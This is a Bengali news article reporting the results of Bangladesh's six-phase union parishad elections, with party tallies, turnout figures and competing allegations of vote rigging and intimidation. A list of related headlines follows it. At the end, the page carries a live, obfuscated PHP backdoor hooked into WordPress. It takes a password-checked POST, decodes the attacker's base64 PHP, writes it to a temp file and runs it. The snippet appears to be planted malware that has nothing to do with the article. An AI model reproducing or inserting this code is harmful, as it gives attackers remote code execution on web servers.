বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

ছয় ধাপের ইউপি নির্বাচনের ফলাফল, আওয়ামী লীগ ২৬৭০ বিএনপি ৩৭২

UPনিউজ ডেস্ক : সংঘাত সহিংসতা, প্রাণহানি, জাল ভোট, কেন্দ্রদখলসহ নানান অনিয়মের মধ্য দিয়েই গত শনিবার শেষ হয়েছে ষষ্ঠ ধাপের নির্বাচন। ইউপি নির্বাচন ৬ ধাপে চার হাজার ৮৫টি ইউনিয়ন পরিষদ ভোট গ্রহণ অনুষ্ঠিত হয়েছে। ৬ ধাপে জয়ের ধারা অব্যাহত রেখেছে ক্ষমতাসীন দল আওয়ামী লীগ।

প্রতিটি ধাপে বড় জয় বিজয় অর্জন করছে দলটি। ছয় ধাপের নির্বাচনী ফলাফল বিশ্লেষন করে দেখা গেছে, আওয়ামী লীগ জয় পেয়েছে ২৬৭০টি ইউপিতে। নির্বাচনী মাঠে প্রধান বিরোধীদল হিসাবে বিএনপি জয় পেয়েছে ৩৭২টি ইউপিতে এবং স্বতন্ত্র প্রার্থী জয় পেয়েছেন ৮৭৮টি ইউপিতে। স্বতন্ত্র প্রার্থীদের অধিকাংশই ক্ষমতাসীন দলের নেতাকর্মী।

এছাড়া জাতীয় পার্টি জয় পেয়েছে ৪৯টি ইউপিতে। ছয় ধাপের নির্বাচনে ২১৫ জন চেয়ারম্যান ভোট ছাড়াই নির্বাচিত হয়েছে। এদিকে ৬২৮ ইউপিতে প্রার্থী দিতে পারেনি বিএনপি। নির্বাচনী মাঠে অন্তত দেড় ডজন দল অংশ নিলেও মূল লড়াই হয়েছে আওয়ামী লীগ ও বিএনপির মধ্যে। নির্বাচন কমিশনের হিসাবে অনুযায়ী, প্রথম ধাপে ৭৪ শতাংশ, দ্বিতীয় ধাপে ৭৮ শতাংশ, তৃতীয় ধাপে ৭৬ শতাংশ, চতুর্থ ধাপে ৭৭ শতাংশ ও পঞ্চম ধাপে ৭৬ দশমিক ৮ শতাংশ ষষ্ঠ ধাপে ৭৫ দশমিক ৬৮ শতাংশ ভোট পড়েছে।

প্রথম ধাপের চূড়ান্ত ফলে আওয়ামী লীগের চেয়ারম্যান হয়েছেন ৪৯৪ জন ও বিএনপির ৫০ জন। স্বতন্ত্র প্রার্থীরা জয় পান১০৯ ইউপিতে। বিনা প্রতিদ্বন্দ্বিতায় নির্বাচিত হয়েছেন আওয়ামী লীগের ৫৪ জন।

দ্বিতীয় ধাপে নৌকা প্রতীকের ৪১৯ জন ও ধানের শীষের ৬৩ জন বিজয়ী হন। ১১৭ ইউপিতে জয় পান স্বতন্ত্র প্রার্থীরা। আওয়ামী লীগের ৩৪ জন প্রার্থী বিনা প্রতিদ্বন্দ্বিতায় নির্বাচিত হন।

তৃতীয় ধাপের ভোটে আওয়ামী লীগ থেকে চেয়ারম্যান হয়েছেন ৩৬৬ জন। বিনা প্রতিদ্বন্দ্বিতায় নির্বাচিত হয়েছেন ২৯ জন। বিএনপির প্রার্থীরা ৬০টি ইউপিতে জয়ী হয়েছেন; স্বতন্ত্র প্রার্থীরা জয় পান ১৩৯টিতে।

চতুর্থ ধাপে নৌকা প্রতীকের ৪০৫ জন জয়ী হয়েছেন। এর সঙ্গে যোগ হয় বিনা প্রতিদ্বন্দ্বিতার ৩৫ জন। এ ধাপে বিএনপির ৭০ জন ও ১৬১ জন স্বতন্ত্র প্রার্থী জয় পেয়েছেন।

পঞ্চম ধাপে আওয়ামী লীগ থেকে ৩৯২ জন ভোটে এবং ৩৯ জন বিনা প্রতিদ্বন্দ্বিতায় নির্বাচিত হয়েছেন। আর বিএনপির ৬৭ জন, স্বতন্ত্র ১৭০ জন, জাতীয় পার্টির ৯ জন এবং অন্য দলের একজন প্রার্থী চেয়ারম্যান হয়েছেন।

ষষ্ঠ ধাপের ইউনিয়ন পরিষদ (ইউপি) নির্বাচনে ৬৬৮টি ফলাফলে আওয়ামী লীগ জয় লাভ করে ৪০৩টিতে, বিএনপি ৬২ আর স্বতন্ত্র প্রার্থী ১৮৪ টি ইউপিতে জয় লাভ করে।

এছাড়া অনিয়মের কারণে কেন্দ্র স্থগিত থাকায় ১৩ ইউপিতে ফের ভোটগ্রহণ করবে সংস্থাটি। এছাড়া ১৭টি ইউপি রাঙ্গামাটির প্রত্যন্ত এলাকায় হওয়ায় ফলাফল এখনো পৌঁছেনি।

ষষ্ঠ ধাপে মোট এক কোটি ১৩ লাখ ৪৩ হাজার ৭১৯ জন ভোটারের মধ্যে ৮৫ লাখ ৮৪ হাজার ৭৫৭ জন ভোটার ভোট দেন। অর্থাৎ ৭৫ দশমিক ৬৮ শতাংশ ভোট পড়েছে। ইউপি নির্বাচনে ফলাফলে বিএনপি পিছিয়ে থাকার কারণ জানতে চায়লে দলটির স্থায়ী কমিটির সদস্য নজরুল ইসলাম খান জানিয়েছেন, বিভিন্ন স্থানে সরকার দলীয় প্রার্থী ও প্রশাসনের ভয়ভীতির কারণে তাদের প্রার্থীরা মনোনয়নপত্র জমা দিতে পারেননি।

কোনো কোনো স্থানে মনোনয়নপত্র জমা দিলেও জোরপূর্বক তা প্রত্যাহারে বাধ্য করা হয়েছে। অবশ্য এই অভিযোগের বিপরীতে কোথাও কোথাও প্রার্থী না পাওয়া বা ব্যক্তিগত কারণে দলীয় মনোনয়ন নিয়েও শেষ পর্যন্ত নির্বাচন থেকে সরে যাওয়ার অভিযোগ রয়েছে।

অন্যদিকে ক্ষমতাসীন আওয়ামী লীগের পক্ষ থেকে বলা হয়েছে, বিএনপি প্রার্থী দিতে না পেরে নির্বাচনকে নানাভাবে বিতর্কিত করার চেষ্টা করছে। এছাড়া ক্ষমতাসীন দল কেন্দ্র দখল করে জল ভোট দিয়ে ফলাফল নিজেদের পক্ষ নিয়েছ।

এ বিষয়ে জানতে চাইলে নির্বাচন কমিশনার মোঃ শাহ নেওয়াজ বলেন, আইন অনুসরণ করেই ইউপি নির্বাচনের আয়োজন করা হচ্ছে। প্রার্থীদের সুবিধার জন্য এবারই প্রথম রিটার্নিং অফিসার ও ডিসি অফিসে মনোনয়ন জমা নেয়া হচ্ছে। প্রার্থীরা যৌক্তিক অভিযোগ করলে প্রয়োজনীয় ব্যবস্থাও নেয়া হয়েছে।

এ জাতীয় আরও খবর

তানজিমকে শাস্তি দিয়েছে আইসিসি

সুনামগঞ্জে বন্যা পরিস্থিতির আরও অবনতির শঙ্কা

পিয়ংইয়ং পৌঁছেছেন রুশ প্রেসিডেন্ট পুতিন

নতুন সময়সূচি চালু : আজ থেকে ব‌্যাংক লেনদেন ১০-৪টা, অফিস চলবে ৬টা পর্যন্ত

তীব্র তাপপ্রবাহের মধ্যে এ বছর ৫৫০ হজযাত্রীর মৃত্যু

ব্রাহ্মণবাড়িয়ায় তিনহাজার টাকা পাওনা নিয়ে হাতাহাতি, বৃদ্ধের মৃত্যু

বছরের সবচেয়ে দামি নায়িকা দীপিকা

বুবলির নাম মুখে নিতে ‘ঘেন্না’ লাগে অপুর

তুফান সিনেমা দেখতে গিয়ে হল ভাঙচুর করলো দর্শকেরা

পতন ঘটতে পারে সরকারের, মোদির জোটের লোকজন যোগাযোগ করছেন : রাহুল

জীবিকার তাগিদ ঘরে ফিরতে দেয়নি তাদের

ঝলসে যাওয়া তাপমাত্রায় পুড়ছেন হজযাত্রীরা, বাড়ছে হতাহত

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}